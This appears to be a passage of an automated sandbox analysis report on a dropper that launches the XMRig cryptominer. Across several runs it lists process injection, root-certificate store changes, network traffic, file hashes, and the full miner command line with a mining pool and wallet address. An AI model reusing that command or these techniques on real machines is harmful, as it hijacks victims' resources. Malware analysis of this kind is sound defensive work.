| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2248 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2248 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2740 wrote to memory of 536 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2740 wrote to memory of 536 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 868 wrote to memory of 1136 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 99.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240226-en
Max time kernel
1796s
Max time network
1810s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 444 wrote to memory of 1948 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3220 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:26
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3512 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3512 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 4564 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2380 wrote to memory of 4564 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
